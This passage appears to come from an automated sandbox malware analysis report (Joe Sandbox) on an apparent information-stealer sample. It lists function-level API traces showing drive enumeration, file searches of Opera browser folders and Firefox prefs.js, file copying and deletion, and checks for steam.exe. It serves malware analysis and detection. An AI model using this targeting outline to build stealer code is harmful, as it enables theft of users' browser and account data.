                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
                                                                                                        • StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
                                                                                                        • StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
                                                                                                        • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                                                                        • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                                                                        • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                        • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                        • API String ID: 2567437900-1710495004
                                                                                                        • Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                        • Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
                                                                                                        • Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                        • Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88
                                                                                                        Function 00415142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                                                                        • _memset.LIBCMT ref: 004151E5
                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041520E
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00415229
                                                                                                          • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
                                                                                                          • Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                          • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                                                                          • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                                                                          • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                          • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                          • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
                                                                                                          • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                          • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
                                                                                                          • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                                                                          • Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
                                                                                                        • lstrlenA.KERNEL32(?), ref: 004152C4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                        • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                        • API String ID: 441469471-147700698
                                                                                                        • Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                        • Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
                                                                                                        • Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                        • Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59
                                                                                                        Function 00401D80 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 529fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
                                                                                                        • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                                        • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                                        • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                                        • FindClose.KERNEL32(?), ref: 004023B6
                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                                        • FindClose.KERNEL32(?), ref: 004026DA
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$lstrcpy$Close$CreateFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                        • String ID: \*.*
                                                                                                        • API String ID: 1116797323-1173974218
                                                                                                        • Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                        • Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
                                                                                                        • Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                        • Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99
                                                                                                        Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
                                                                                                        • StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
                                                                                                        • StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
                                                                                                        • StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,0043758C,004368AF), ref: 0040D7E8
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040D8B3
                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0040D956
                                                                                                        • FindClose.KERNEL32(?), ref: 0040D96A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                        • String ID: prefs.js
                                                                                                        • API String ID: 893096357-3783873740
                                                                                                        • Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                        • Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
                                                                                                        • Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                        • Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99
                                                                                                        Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
                                                                                                        • StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
                                                                                                        • StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
                                                                                                        • StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040B780
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
                                                                                                        • FindClose.KERNEL32(?), ref: 0040B8FF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3801961486-0
                                                                                                        • Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                        • Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
                                                                                                        • Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                        • Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9
                                                                                                        Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 004124E4
                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
                                                                                                        • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                        • String ID: steam.exe
                                                                                                        • API String ID: 1799959500-2826358650
                                                                                                        • Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                        • Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
                                                                                                        • Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                        • Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15
                                                                                                        Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                        • String ID: /
                                                                                                        • API String ID: 507856799-4001269591
                                                                                                        • Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                        • Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
                                                                                                        • Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                        • Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54
                                                                                                        Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
